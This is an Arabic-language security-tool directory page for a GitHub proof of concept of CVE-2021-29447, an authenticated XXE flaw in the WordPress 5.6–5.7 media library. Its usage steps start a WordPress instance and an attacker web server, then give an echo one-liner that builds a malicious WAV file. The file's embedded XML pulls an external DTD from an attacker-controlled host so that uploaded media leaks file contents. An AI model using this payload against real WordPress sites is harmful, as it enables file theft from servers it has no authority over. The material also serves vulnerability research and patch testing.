Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-29447 — WordPress - XXE بعد المصادقة (CVE-2021-29447) | Kitploit
أدوات/GitHubGitHub/motikan2010/cve-2021-29447
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubmotikan2010/cve-2021-29447

CVE-2021-29447

WordPress - XXE بعد المصادقة (CVE-2021-29447)

عرض المستودع
4311منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ووردبريس 5.6-5.7 - ثغرة XXE بمصادقة (مؤلف+) (CVE-2021-29447)

الاستخدام

الخطوة 1. تشغيل ووردبريس

root@kitploit:~
$ make up-wp

الخطوة 2. تشغيل خادم الويب الخاص بالمهاجم

root@kitploit:~
$ make up-mal

الخطوة 3. توليد ملف WAV خبيث

بدون حزمة wavefile npm (موصى به)

root@kitploit:~
$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://host.docker.internal:8001/evil.dtd'"'"'>%remote;%init;%trick;] >\x00'> malicious.wav

باستخدام حزمة wavefile npm

root@kitploit:~
$ make make-wav

الخطوة 4. تسجيل الدخول إلى ووردبريس ورفع ملف WAV إلى الوسائط الجديدة

الخطوة 5. فك الترميز

المراجع

  • ووردبريس 5.6-5.7 - ثغرة XXE بمصادقة داخل مكتبة الوسائط تؤثر على أمان PHP 8
تنزيل الأداة